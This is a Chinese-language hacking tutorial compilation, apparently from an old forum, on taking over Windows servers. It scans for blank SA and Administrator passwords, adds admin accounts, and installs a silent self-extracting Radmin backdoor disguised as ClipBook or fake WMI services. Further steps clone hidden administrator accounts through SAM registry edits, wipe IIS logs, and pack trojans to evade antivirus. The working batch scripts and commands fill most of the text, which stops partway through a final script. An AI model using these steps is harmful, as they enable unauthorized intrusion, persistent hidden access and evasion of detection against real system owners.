终结完整编

终结完整编
工具:WINNTAutoAttack自动攻击器(扫漏洞)

SQLTOOLS(SA空口令连接器)

RAMDIN影子3.0中文版( 远程控制程序)

RADMIN注册码:

08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23

SC.exe port.bat query.exe quser.exe(隐藏3389服务及不让管理发现自己程序)

CleanIISLog.exe(小榕的擦PP程序)

3389.exe(开3389端口服务的)

psu.exe(使用被禁止的Guest帐户要用到的)

mstsc.exe( 远程桌面连接程序)

下载(点右键用下载工具下)

一.扫到SA弱口令..(自动攻击器)

二.用SQLTOOLS连上去建一个用户

net start telnet 开telnet服务

net user mint mint /add 添加用户mint密码为mint

net localgroup administrators mint /add 将帐号mint升级为管理员

三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)

制作RAD.EXE过程:

1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe(从新

2、在本地设置服务端(一定要生成)

设置密码-->>设置连接端口(默认4489)-->>生成

3、导出注册表HKEY_LOCAL_MACHINE//SYSTEM//Radmin的键值为1.reg

4、编写一个批处理,并命名为u.bat

--------------------------------------------

@echo off

net stop r_server

--------------------------------------------

5、写第二个批处理,r.bat,内容为

--------------------------------------------

@echo off

@Explorer.exe /uninstall /silence

@Explorer.exe /install /silence

@regedit /s 1.reg

@echo off

@Explorer.exe /uninstall /silence

@Explorer.exe /install /silence

@regedit /s 1.reg

@net start r_server

@del rad.exe

@del 1.reg

@del r.bat

@del u.bat

--------------------------------------------

6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包

7、将Rad.rar制作成自解压文件.

选择Default.sfx的自释放模块-->>高级自释放选项

-->>常规

释放路径:%systemroot%//system32

安装程序:释放后运行:r.bat 释放前运行u.bat

-->>摸式

缄默模式:全部隐藏 覆盖方式:覆盖所有文件

-->>确定-->>确定

生成完成

四.用RADMIN客服端连接....

上传文件到c://WINNT(XP是windows):

port.bat(如果是在XP下..这个要把里面的WINNT改为Windows)

query.exe quser.exe

SC.exe

CleanIISLog.exe.exe

3389.exe

psu.exe

最好再上传一个反弹后门

RADMIN进入TELNET

运行 c://winnt//3389.exe

重启肉鸡

五.重启后用 远程桌面 远程器连上去

这里就有时会出现个问题..

使用3389登陆。发现登陆用户已满。不用怕。我们把他踢出去。

telnet对方ip。发现需要NTLM 身份验证。

我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。

找到c://winnt//system32//cmd.exe 建立一个快捷方式到桌面。

修改cmd的快捷方式属性为允许其他身份登陆。

然后运行桌面上的cmd.exe的快捷方式。输入帐号mint密码mint

telnet对方ip.直接可以登陆对方电脑了。

使用命令

c://query user (查看对方目前终端登陆状况。)

运行命令

c://logoff 1(踢出去一个管理者)

再用c://query user检查一便~~(这就是为什么不马上用1.bat了)

六.连上后..在cmd下运行

c://winnt//log . 自己的IP .(擦PP)

c://winnet//1.bat (删除覆盖查看当前在线用户文件)

七.打SA空口令补丁

程序-->>Microsoft SQL Server-->>查询分析器(有放大镜的)

-->>Windowst身位验证登陆

复制一下代码:SELMIS

--------------------------------------------

if exists (select * from

dbo.sysobjects where id = object_id(N/'[dbo].[xp_cmdshell]/') and

OBJECTPROPERTY(id, N/'IsExtendedProc/') = 1)



exec sp_dropextendedproc N/'[dbo].[xp_cmdshell]/'



GO

--------------------------------------------

按F5(运行)

关了退出SQL Server再用SQL Server身位验证进一次.退出(这是为了不留下记录)

八.改3389端口和服务名称

修改服务器端的端口设置 ,注册表有2个地方需要修改。

[HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Control//Terminal Server//Wds//rdpwd//Tds//tcp]

PortNumber值,默认是3389,选择10进制 修改成所希望的端口,比如1314

第二个地方:

[HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Control//Terminal Server//WinStations//RDP-Tcp] 

PortNumber值,默认是3389,选择10进制 修改成所希望的端口,比如1314

要重启系统才能用新端口连.(不急..改了他的服务名再重启系统吧)

导出3389服务的

[HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//TermService]

的键值为mm.reg文件.

编辑mm.reg文件.替换TermService为Alerter(错误警告服务..别的服务也行)

再把第十行的"Description"="(这里是服务说明..改为你所换的服务说明..这里改为通知所选用户和计算机有关系统管理级警报。)"

第十一行的"DisplayName"="(这里是服务名称..改为你所换的服务名称..这里改为Alerter)

保存..再导入注册表(这里要先运行Services.msc(可在CMD下打这命令)服务管理器..把Alerter的服务先停止)

再在CMD下

CD c://winnt//system32

copy termsrv.exe service.exe(这里是复制termsrv.exe为Alerter服务文件名差不多的文件)

CD C://winnt

sc 127.0.0.1 config Alerter binpath= c://winnt//system32//service.exe(这里是从新定向Alerter服务文件.服务名一定要区分大小写A要大写)

九.注消后(注消比直接关要好些)..用Radmin重启肉鸡..



十.使用被禁用的帐户[Guest]登陆.删除自己开始建的帐号

1.使用psu.exe展开注册表到

HKEY_LOCAL_MACHINE//SAM//SAM//Domains//Account//Users

用法:[psu -p regedit -i pid]

Pid 的值为在任务栏空白处点右键-->>任务管理器--->>进程中的winlogon.exe后面的数值就是PID数值

如:psu –p regedit –i 157

将Guest克成管理员权限

克成管理员权限的方法:

找到HKEY_LOCAL_MACHINE//SAM//SAM//Domains//Account//Users//Names//Administrator的类型值.

在HKEY_LOCAL_MACHINE//SAM//SAM//Domains//Account//Users//下找到这个类型值在复制数值名为F的数值数剧覆盖相应的Guest的类型值(找的方法一样)

导出Guest的配置(也就是导出HKEY_LOCAL_MACHINE//SAM//SAM//Domains//Account//Users//Guest和他相应的类型值的数据) 然后删除Guest的配置

2.查看计算机管理中帐户列表 刷新这时候会出现错误[找不到帐户](跳过这步也行)

3.将Guest的配置(二个REG文件导进注册表)

4.修改Guest帐户密码,命令行下禁用Guest帐户[一定是命令行下]

net user Guest **** [修改密码]

net user Guest /active:yes

net user Guest /active:no[命令行下禁用Guest]

5.实验被禁止的帐户Guest是否可用.

6.用Guest登陆后删除自己建的帐号

net user mint /del

整个过程结束

最后最好把RADMIN的服务也改了..多留个后门多条路..呵呵

整个过程全部结束..这机子就真正变成你的肉鸡了...

文章里面的内容都是以下动画的内容(通过我自己的理解写的..也许存在许多错误..希望对和偶一样的菜鸟有帮助)

笑语☆嫣然的《终结3389》

mervin制作 <《终结3389》补充版>

孤狼望月 <使用被禁用的帐户[Guest]登陆>

(他还有个(隐藏帐号后门教程)也差不多)

碎片

最后送一个找固定IP肉鸡的方法:

菜菜鸟教程之-如何提高扫描到肉鸡的机会 BY:网络凡人

先找个有不正常端口的代理,代理我一般到网迷之家(www.52cyq.com)拿的。就这个好了

218.58.88.15:45576 [山东省 青岛市](我的是教育网,扫描不到国外的机的,所以用国内的IP来

做试范),我把它扩充了整一个网段。由218.58.88.1-218.58.88.255你可以扩充成218.58.80.1-

218.58.90.255 .端口为了减少动画的大小,就扫描3389好了,。IP扩充多少就要看你

的网快还是慢。快的就扩充多点,慢的只扫描一个c段IP好了。看到没有,[218.58.88.8]:

发现 NT-Server弱口令: Administrator/[空口令]就是这么简单就可以扫描到肉鸡的,记得,

我这里出不了国外,才扫描国内的机。你们扫描国外的机,不要扫描国内的机啊~

如果发生了什么事,公安会找你的哦。好了。扫描就说到这了。
、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户

net user hacker$ 1234 /add

2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。

3、点“权限”以后会弹出窗口

点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将administrator加入,并设置权限为“完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。

4、再点“开始”→“运行”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。

打开键:HKEY_LOCAL_MAICHINE//SAM//SAM//Domains//account//user//names//hacker$"

5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键"F"的值复制,并覆盖hacker$对应的项00000409下的键"F"的值,然后再将00000409.reg与hacker.reg合并。

6、在命令行下执行net user hacker$ /del将用户hacker$删除:net user hacker$ /del

7、在regedit.exe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可

8、到此,隐藏的超级用户hacker$已经建好了,然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINE//SAM//SAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。

9、注意:隐藏的超级用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用“net user”命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。


如何在命令行下 远程建立隐藏的超级用户

在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来 远程启动,当然其方法也可以,只要能启动schedule服务就行。

对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。

1、首先找到一台肉鸡,至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为administrator,密码为12345678的肉鸡,现在我们开始在命令行下 远程为它建立隐藏的超级用户。(例子中的主机是我的局域网内的一台主机,我将它的ip地址改为13.50.97.238,,请勿在互联网上对号入座,以免骚扰正常的ip地址。)
2、先与肉鸡建立连接,命令为: net use 13.50.97.238//ipc$ "12345678" /user:"administrator

3、用at命令在肉鸡上建立一个用户(如果at服务没有启动,可用小榕的netsvc.exe或sc.exe来 远程启动):at 13.50.97.238 12:51

c://winnt//system32//net.exe user hacker$ 1234 /add

建立这个加有$符的用户名,是因为加有$符后,命令行下用net user将不显示这个用户,但在帐户管理器却能看到这个用户。

4、同样用at命令导出HKEY_LOCAL_MACHINE//sam//sam//Domains//account//users下键值:at 13.50.97.238 12:55

c://winnt//regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE//SAM//SAM//Domains//account//users//

/e 是regedit.exe的参数,在_LOCAL_MACHINE//SAM//SAM//Domains//account//users//这个键的一定要以//结尾。必要的情况下可以用引号将"c://winnt//regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE//SAM//SAM//Domains//account//users//"引起来。

5、将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为:copy 13.50.97.238//admin$//system32//hacker.reg

c://hacker.reg

修改的方法图形界中已经介绍过了,这里就不作介绍了。

6、再将编辑好的hacker.reg拷回肉鸡上 copy c://hacker.reg 13.50.97.238//admin$//system32//hacker1.reg

7、查看肉鸡时间:net time 13.50.97.238 然后用at命令将用户hacker$删除:

at 13.50.97.238 13:40 net user hacker$ /del

8、验证hacker$是否删除:用

net use 13.50.97.238 /del 断开与肉鸡的连接。

net use 13.50.97.238//ipc$ "1234" /user:"hacker$" 用帐户hacker$与肉鸡连接,不能连接说明已删除。

9、再与肉鸡建立连接:net use 13.50.97.238//ipc$ "12345678" /user:"administrator"

再取得肉鸡时间,用at命令将拷回肉鸡的hacker1.reg导入肉鸡注册表:

at 13.50.97.238 13:41 c://winnt//regedit.exe /s hacker1.reg

regedit.exe的参数/s是指安静模式。

10、再验证hacker$是否已建立,方法同上面验证hacker$是否被删除一样。

11、再验证用户hacker$是否有读、写、删的权限,如果不放心,你还可验证是否能建立其它帐户。

12、通过11可以断定用户hacker$具有超级用户权限,因为最初我用at命令建立它的时候是一个普通用户,而现在却具有 远程读、写、删的权限。

三、如果肉鸡没有开3389终端服务,而我又不想用命令行,怎么办?

这种情况下,你也可以用界面方式来 远程为肉鸡建立隐藏的超级用户。因为regedit.exe、regedt32.exe都有连接网络注册表的功能,你可以用regedt32.exe来为 远程主机的注册表项设置权限,用regedit.exe来编辑 远程注册表。帐户管理器也有一项连另一台计算机的功能,你可以用帐户管理器为 远程主机建立和删除帐户。具体步聚与上面介绍的相似,我就不多说了,只它的速度实在是令人难以忍受。

但是这里有两个前提:1、先用net use 肉鸡ip//ipc$ "密码" /user:"超级用户名"来与 远程主机建立连接以后,才能用regedit.exe regedt32.exe及帐户管理器与 远程主机连接。

2、 远程主机必须开启 远程注册表服务(没有开启的话,你也可以 远程开启,因为你有超级用户的密码了)。

四、利用被禁用的帐户建立隐藏的超级用户:

我们可以用肉鸡上被禁止的用户来建立隐藏的超组用户.方法如下:

1.想办法查看有哪些用户被细心的管理员禁止,一般情况下,有些管理员出于安全考虑,通常会将guest禁用,当然了会禁用其它用户。在图形界面下,非常容易,只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉;而在命令行下,我还没有想到好的办法,只能在命令行下用命令:"net user 用户名"一个一个来查看用户是否被禁用。

2.在这里,我们假设用户hacker被管理员禁用。首先,我先用小榕的超组用户克隆程序CA.exe,将被禁用的用户hacker 克隆成超级用户(克隆之后,被禁用的用户hacker就会自动被激活了): CA.EXE 肉鸡ip Administrator 超级用户密码 hacher hacher密码。

3.如果你现在一个cmdshell,如利用telnet服务或SQLEXEC连接肉鸡的msSQL的默认端口1433得到的shell都可以,这时你只要输入命令:

net user hacker /active:no 这样用户hacker就被禁用了(至少表面上是这样的),当然你也可以将用户hacher换成其它的被禁用的用户。

4.这时如果你在图形界面下看帐户管理器中的用户时,会发现用户hacker被禁用了,但事实上是这样的吗?你用这个被禁用的用户连接一下肉鸡看看是否能连上?用命令:net user 肉鸡ip//ipc$ "hacker密码" /user:"hacker" 连一连看看。我可以告诉大家,经过我多次试验,次次都能成功,而且还是超级用户权限。

5.如果没有cmdshell怎么办?你可以我上面介绍的at命令来禁用用户hacker;命令格式:at 肉鸡ip 时间 net user hacker /active:no

6.原理:具体的高深的原理我也说不上来,我只能从最简单的说。你先在图形界面下在帐户管理器中禁用一下超级用户administrator看看,肯定会弹出一对话框,并禁止你继续禁用超级用户administrator,同样,因为在克隆时,hacker在注册表的"F"键被超级用户administrator在注册表的"F"键所替代,因而hacker就具有了超级用户的权限了,但是由于hacker在注册表内"C"健还是原来的"C"键,所以hacker还是会被禁用,但是它的超级用户权限却不会被禁用,因此被禁用的用户hacker还是可以连接肉鸡,而且还具有超级用户的权限。具体我也说不明白,大家权且这么理解吧。
五、注意的几点事项:

1、隐藏的超级用户建立以后,在帐户管理器中和命令行下均看不到这个用户,但这个用户却存在。

2、隐藏的超级用户建立以后,就不能再修改密码了,因为一旦修改密码,这个隐藏的超级用户就会暴露在帐户管理器中,而且不能删除。

3、如在本机上试验时,最好用系统自带的备份工具先备份好本机的“系统状态”主要是注册表的备份,因为本人做试验时,曾出现过帐户管理器中看不到任何用户,组中也看不到任何组的现象,但它们却存在。幸好我有备份,呵呵。SAM键是毕竟系统最敏感的部位。

4、本方法在2000/XP上测试通过,未在NT上测试。本方法仅供研究,请勿将本方法用于破坏上,利用本方法造成严重后果者,由使用者负责,本人概不负责。
对于4899肉鸡,相信大家都不会陌生吧。Radmin 远程控制软件最大的优点就是功能齐全,便于操作,能够躲避一些软件的查杀。实在是居家旅行,杀人灭口,绝好武器。那么……有的朋友要问了多么好的宝马良驹在哪里可以找到啊?问的好,各大黑客网站均能下载,童叟无欺啊!(这段对白怎么这么耳熟啊?)

第一章 4899空口令肉鸡争夺战

4899空口令肉鸡是由一些超级菜鸟们用Windows NT/2000
自动攻击探测机对他感兴趣的某段IP细心的,无微不至的扫描孕育而生的~~~(鼓掌,有请我们今天的主角,4899空口令肉鸡隆重登场,哎呀,谁拿西红柿扔我?忒不讲公德呢?扔也不扔个红的,绿的怎么吃啊?)
既然4899空口令肉鸡这个多,那么偶就先从它的由来说起吧!Windows NT/2000
自动攻击探测机
这款扫描软件不但集成了扫描器的特点,还添加了一些漏洞的利用功能。它能够对扫描出IIS溢出的,弱口令的和SA空口令的电脑上传并安装 远程图形控制软件Radmin,即把R_Server.exe,AdmDll.dll和raddrv.dll这三个文件上传到其电脑系统跟目录%systemroot%/system32子目录下,并行运行R_Server.exe可执行文件。由于 远程上传的Radmin没有经过配置,因此在对方机子的任务栏里出现了Radmin服务程序的托盘(如图1-1)。这样不就成个此地无银三百两,机器的主人一定能发现这个不正常的托盘。我想他第一个动作就是把鼠标移动到托盘位置,一点就显示出了有某某IP正在连接本机。如果是个只知道上网聊天的MM她第一个动作就是把网断了,逃过别人的控制再说。如果是个有经验的老鸟那么各位就要小心了,他会通过显示出的IP查到你的电脑或者你用来扫描的肉鸡,这样就大大的不妙了。所以了,这个托盘的隐藏是非常必要和急切的。
在做我们的工作之前,要做好一些准备活动。首先把4899空口令肉鸡设置上密码,在Radmin的CMD控件下输入命令r_server.exe
/port:520 /pass:hackbase /save
/silence。有些同僚总是抱怨这个命令不好用,我看过他们出问题的动画。无论是在CMD命令下或者在"运行"下输入这个命令都是正确的,而他们出错的原因就是没有添加参数"/save"保存,和参数"/silence"后台安装。这样设置好连接端口和密码,同道中人就算用"4899空口令扫描器"扫到你做的肉鸡也晚了,偶已经添加过密码了,而端口在肉鸡重起后能够修改成功。接下来我们就要把一个反弹木马放到肉鸡上,以免对方是动态IP,肉鸡就飞掉了。这里我们可以用灰鸽子VIP或黑洞2004这两个反弹木马都很不错的哦~~~。顺便说一句您的木马一定要做过特征码修改或者加壳啊,这样能够躲避对方杀毒软件的查杀。在这里再说句题外话对木马加壳不是加的壳越多就越安全的,这样大家就走入了多加壳的误区。这样不但不能躲过杀毒软件的查杀,还有可能使木马的功能受到影响。对喜欢加壳躲杀毒软件的朋友偶建议下先把木马脱壳,然后再加个不知名的壳(ASPack,
UPX这些加壳软件的壳已经被有些杀毒软件列入黑客程序列表了),然后在用几款世面流行的杀毒软件在本地机器事先做个放杀毒检测。
这样的黑客程序才是我们的杀手锏。
前期工作制作完毕后,您就可以耐心的工作了。为了做到隐藏托盘的目的,偶想了两个办法:
第一,
在您的机器上事先安装并配置好Radmin,把注册表中的HKEY_LOCAL_MACHINE/SYSTEM/RAdmin导出为radmin.reg,这个就是绝对符合您意愿的Radmin配置,把radmin.reg上传到对方机器输入命令regedit
/s
radmin.reg。这样在机器重起或者您帮助他重起Radmin服务的时候,任务栏里的Radmin托盘就消失了。
第二, 写个批处理文件重新调整Radmin配置。批处理文件内容如下:
@echo off
@r_server.exe /port:520 /pass:hackbase /save
/silence
echo Windows Registry Editor Version 5.00 >ftp.reg

echo
[HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/v2.0/Server/Parameters]
>>ftp.reg
echo "DisableTrayIcon"=hex:01,00,00,00 >>ftp.reg
regedit /s ftp.reg
del ftp.reg
到这里菜鸟的"保鸡"反击战已经告一段落。刚才我们不是还放了个灰鸽子吗,这样这台肉鸡上就有我们的两匹宝马良驹了。小样让你跑,还是逃不出如来佛的掌心吧!呵呵,我得意的笑~~~
在长期的摸索研究工作中,偶发现个Windows NT/2000
自动攻击探测机的小BUG。等偶慢慢道来,各位看官听仔细啊。Radmin
3.0影子版的客户端是Radmin公司开发的,而服务端程序缺因为种种原因,没有和各位见面。有的说是Radmin公司在开发新的功能,服务端没有开发完;有的说Radmin公司现在只对付费用户提供服务端,这些偶就不得而知了。可是我们敬爱的影子为我们制造出了"Radmin
3.0服务端"其本质就是2.0版本的部分修改,对其图标做了修改和加壳处理。可是在汉化过程中,不知道什么原因,它在任务栏里的Radmin托盘变成了一个空白的地方,要是不注意是看不出来的(如图1-2、1-3)。所以了,我们在运行Windows
NT/2000
自动攻击探测机扫描机子的时候,把它同目录下释放出来的R_Server.exe,替换成3.0版本的R_Server.exe。这样扫描出来上传图形控制软件的机器,在其任务栏里就出现了一个空白的地方。当把鼠标点到上面的时候也没有了某某IP正在连接的提示,这样就欺骗了一些机主。呵呵,旁门左道大家不要见笑啊。可是这个小BUG启发了我的另一个思路,就是把我们的Radmin.exe自动运行的配置包重命名为R_Server.exe,然后替换掉R_Server.exe,我们不就有了所以自己的机子了吗?好,说干就干。把我的Radmin自解压包替换掉R_Server.exe,可是这回Windows
NT/2000
自动攻击探测机就没有了上传成功的小提示。(如图:1-4)(广告过后更精彩)我一直对这个验证方法不甚了解,想找作者问问,可是他老人家还换QQ了。哪位高手有高见,请不吝赐教,偶的QQ:9500142。言归正传,那也难不倒我,我们把扫描出来有漏洞的所有IP复制到一个文本文件中,用superscan导入IP列表,扫描我设置Radmin服务的端口,这样被我上传Radmin的机器就都上门报道了。Yeah!(如图:1-5)

第二章 Radmin 服务端高级配置

既然我们对Radmin这么情有独钟,那么我们就要打造不死系的超级后门木马。具推断当前安装过Radmin控制软件的肉鸡占安全性低级的电脑的80%左右,所以我们上传木马之前,要把其系统中可能存在的Radmin服务停止掉,替换成我们的服务为己所用。绝大部分的安装Radmin的肉鸡都是用的R_Server.exe程序。可是种植的原始情况分为两种:
第一 就如上面所说那样,是用Windows NT/2000
自动攻击探测机上传安装的,其安装服务的名称为"radmm"。启动和停止该服务的命令分别为"net
start radmm"和"net stop radmm"。
第二
一些喜欢偷懒的朋友,把自己的Radmin是默认的R_Server.exe程序,其安装服务的名称为"Remote
Administrator Service"。启动和停止该服务的命令分别为"net start
r_server"和"net stop r_server"。
偶发现一个对付这两种配置的小窍门,就是可以用"r_server.exe
/start"和"r_server.exe /stop"启动和停止服务,然后我们在替换为自己的配置。
Follow Me!
对配置Radmin自解压程序的,我有两个思路可供大家参详,希望对您能配置能够有所启发和帮助.
第一
就是替换系统服务的方法。如果您对Windows系统服务的工作机理不甚了解,那么请跳过这里,看接下来的第二种配置.
1、编写一个批处理文件,命名为first.bat
--------------------------------------------
@echo off
r_server.exe /stop
--------------------------------------------
这样做是假定肉鸡上已经由黑友安装过Radmin服务,杀无赦。
2、接下来我拿系统的ClipBook服务开刀做下替换。编写一个批处理文件,命名为baby.bat
--------------------------------------------
@echo off
@sc stop ClipBook
@sc delete ClipBook
@sc stop r_server

@del %systemroot%/system32/AdmDll.dll
@del %systemroot%/system32/raddrv.dll
@del %systemroot%/system32/R_Server.exe
@del %systemroot%/system32/dllcache/ClipSrv.exe
@del %systemroot%/system32/ClipSrv.exe
@copy %systemroot%/system32/Setup/ClipSrv.exe
%systemroot%/system32/ClipSrv.exe
@copy %systemroot%/system32/Setup/raddrv.dll
%systemroot%/system32/raddrv.dll
@copy %systemroot%/system32/Setup/AdmDll.dll
%systemroot%/system32/AdmDll.dll

@ClipSrv.exe /install /silence
@regedit /s radmin.reg
@regedit /s server.reg

@sc config ClipBook start=auto
@sc start ClipBook
@sc delete r_server

@del radmin.reg
@del server.reg
@del sc.exe
@clss.exe
@cls
@del baby.exe
@shutdown.exe -f -r
@del first.bat
@del baby.bat
@del clss.exe
@del shutdown.exe
--------------------------------------------
Radmin.reg注册表文件时服务配置,Sc是微软服务修改程序(比尔其实对我们还满不错的哦,嘿嘿),clss.exe是日志清除工具(大家要养成勤扫地的习惯噢!),shutdown.exe是关机程序,这个程序无关紧要,关键看您的性子怎么样了(急性子的黑友建议使用)。Server.reg就是ClipBook服务的描述信息了,要伪装当然要做的够专业啊。
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Services/ClipSrv]
"Description"="启用"剪贴簿查看器"储存信息并与 远程计算机共享。如果此服务终止,"剪贴簿查看器"
将无法与 远程计算机共享信息。如果此服务被禁用,任何依赖它的服务将无法启动。"
"DisplayName"="ClipBook"

上面的信息是由原ClipBook服务所对应的注册表键值
[HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Services/ClipSrv]
提取出来的。
因为分支包含了部分电脑路径和安全信息,每个电脑都有些许区别,所以把精炼的东西提取出来做为我们的伪装信息。

然后,把我们所用到的工具、注册表文件、批处理文件打包。配置RAR高级自解压格式所选项嘀时候,注意那个解压路径
写成%systemroot%/system32/Setup这个目录
步骤1 选择『在当前文件夹中创建』
步骤2 在『解压后运行』输入baby.bat
步骤3 在『解压前运行』输入first.bat
步骤4
选择RAR高级自解压缩选项中的『模式』改两个地方,选择『全部隐藏』和『覆盖所有文件』。命名自解压缩程序命为baby.exe
第二 就是添加一个完全属于偶嘀服务的方法。
1、编写一个批处理文件,命名为first.bat
--------------------------------------------
@echo off
r_server.exe /stop
--------------------------------------------
呵呵,安全第一。
2、接下来偶为我亲爱的小马创建个服务。
服务名称:wmipd
显示名称:Windows Management Instrumentation Player
Drivers
编写一个批处理文件,命名为boy.bat
--------------------------------------------
@echo off
@sc stop r_server

@del %systemroot%/system32/AdmDll.dll
@del %systemroot%/system32/raddrv.dll
@del %systemroot%/system32/R_Server.exe
@wmsrv.exe /install /silence
@regedit /s radmin.reg
@net start wmsrv
@attrib +r +h
%systemroot%/system32/drivers/wmsrv.exe
@attrib +r +h
%systemroot%/system32/drivers/admdll.dll
@attrib +r +h
%systemroot%/system32/drivers/raddrv.dll
@regedit /s server.reg

@sc config Windows Management Instrumentation
Player Drivers start=auto
@sc start Windows Management Instrumentation
Player Drivers
@sc delete r_server

@del radmin.reg
@del server.reg
@del sc.exe
@clss.exe
@cls
@del boy.exe
@del first.bat
@del boy.bat
--------------------------------------------
Radmin.reg注册表文件时服务配置,Sc是微软服务修改程序,clss.exe是日志清除工具。Server.reg就是Windows
Management Instrumentation Player
Drivers服务的描述信息了,要伪装当然要做的够专业啊。
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Services/wmipd]
"Description"="为Windows Media
Player提供加载进程及为其他的移动媒体,驱动程序和库提供基层安全协议服务。"
"DisplayName"="Windows Management Instrumentation
Player Drivers"

然后,把我们所用到的工具、注册表文件、批处理文件打包。配置RAR高级自解压格式所选项嘀时候,注意那个解压路径
写成%systemroot%/system32/drivers这个目录
步骤1 选择『在当前文件夹中创建』
步骤2 在『解压后运行』输入boy.bat
步骤3 在『解压前运行』输入first.bat
步骤4
选择RAR高级自解压缩选项中的『模式』改两个地方,选择『全部隐藏』和『覆盖所有文件』。命名自解压缩程序命为boy.exe

如果在Radmin服务已经安装的前提下,还可以用Sc.exe把它的服务信息修改了,在这里我就不做演示了,大家动手做做~~~

优点:
1.在系统服务中看见的是Windows Management Instrumentation
Player Drivers服务
(可以自定义)
2.服务说明是 为Windows Media
Player提供加载进程及为其他的移动媒体,驱动程序和库提供基层安全协议服务
3.在cmd命令提示符下面,使用net start命令看见的是自启动服务是
Windows Management Instrumentation Player Drivers
4.在进程中看见的是wmsrv(可以自定义,在boy.bat文件中相应的位置改一下,注意不要和已有的系统进程起冲突)


第三章 Radmin的访问权限的设置

设置恰当Radmin的访问权限,能够更好的方便在线教学工作的开展,还可以让高手帮
您设置一些东西和 远程维护系统,又不会担心别人窥探您的隐私或给下个木马类的好东东。
(呵呵~~~~偶不是贬低高手的道德噢,请高手们别生气~~~)
设置Radmin的访问权限的,首先要设置一个登陆用的帐号net user hackbase
neugirl /add
用户所属组为user,这个权限已经够用了。
输入r_server.exe /setup命令调出Radmin服务端设置程序

步骤1 选择『设置参数』,其他参数的配置我在这就不多说了。现在我们关键讲述下『连接确定』的设置

如果是做在线教学工作或 远程协助,在这里选择『使用用户许可』---『连接超时自动拒绝』超时时间,设置的长点。这里我设置为30秒。(如图:3-1)

如果您要是在肉鸡上建立的用户,使用 远程操作,那么『连接确定』就不要设置了。免得跳出个要求连接的对话框把管理员吓坏了,这样就不好了。

步骤2
选择『设置密码』---『使用NT用户安全验证』,激活『确定使用』,然后点击『许可』---『添加』。然后会弹出一个『Add
user/group』的会话框,点击左下角的『显示用户』,这样电脑中的所有组和用户都显示出来了。选中偶刚才新建的hackbase帐户,添加到右边的会话框中,在右上角的『存取权利』中选中您希望为hackbase该用户开启的访问权限。(如图:3-2)
具体权限分配:
Special access 特殊权限
All access(RTVFC) 所有权限
Full control of screen 完全控制
File transfer 文件传送
View of screen 查看屏幕
Telnet Telnet连接
Redirect 重定向(这个功能偶一直没有找到是控制什么的,请高手赐教)
No access 无权限

然后一路点OK,回到Radmin服务端设置程序后点击『安装程序』,等到安装通知提示"服务安装完成"后,在CMD命令提示符下输入命令net
start r_server启动服务。
步骤3 样您在客户端连接服务端电脑的时候就弹出『输入NT用户』的对话框,在这里我填写的是
用户名:hackbase 密码:neugirl 所属域(这个可以不填写)(如图:3-3)

其中Redirect
重定向这个控制什么,偶一直没有弄明白。请请高手赐教。经过妹妹偶做过大量试验证实:Radmin的访问权限的设置适合于Windows
2000和Windows 2003系列各个版本上使用,对于Windows XP
系统Radmin的2.1和3.2版本都不支持。不知为何原因,希望高手能够指点。如果想对 远程主机做Radmin的访问权限配置只要在本地主机事先建立一个帐户,然后分配所希望开放的权限,点击『安装程序』,然后在注册表[HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/v2.0/Server/Users]分支中就会出现您分配过权限的帐户名,在它的键值中有该用户所属域的"组"及"Radmin控制权限",把这个注册表文件导入到 远程主机中,然后在其电脑中建立了同用户名的账号,这样就全部搞定了。
有兴趣的朋友还可以建个 隐藏账号作为我们的永久后门!


后记:下面还有一个我写的批处理文件,是用来定时运行Radmin程序的,虽然微软公司的系统维护工具soon和sleep都能够定时运行程序,可使用自己写的批处理文件能够达到目的,也是很欣慰的。嘿嘿
这里说明下批处理文件编写的思路:首先查询本机的当前时间,当然把批处理文件放到肉鸡上就能查肉鸡的时间了。然后把读取的时间暂时存储在内存中,把时间函数拆分为"小时"和"分钟"两部分,付值到tokens调用的两个函数中。在set
/a mm=%mm%+2一句中添加上你希望延长多久再运行程序。

@echo off
color 0A
cls

Rem
===============以下是radmin.bat的内容=================
@echo off
